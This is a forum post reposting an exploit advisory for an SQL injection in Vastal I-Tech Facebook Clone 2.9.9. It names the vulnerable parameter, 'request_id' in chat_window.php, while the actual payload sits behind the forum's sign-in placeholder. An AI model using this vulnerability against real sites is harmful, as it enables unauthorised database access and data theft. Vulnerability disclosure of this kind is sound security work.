dEEpEst Posted February 28, 2018 Share Posted February 28, 2018 [HIDE-THANKS] # # # # # # Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection # Dork: N/A # Date: 27.01.2018 # Vendor Homepage: This is the hidden content, please Sign In or Sign Up # Software Link: This is the hidden content, please Sign In or Sign Up # Version: 2.9.9 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: This is the hidden content, please Sign In or Sign Up # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an users to inject sql commands.... # # Proof of Concept: # # http://localhost/'>http://localhost/[PATH]/chat_im/chat_window.php?request_id= This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
Recommended Posts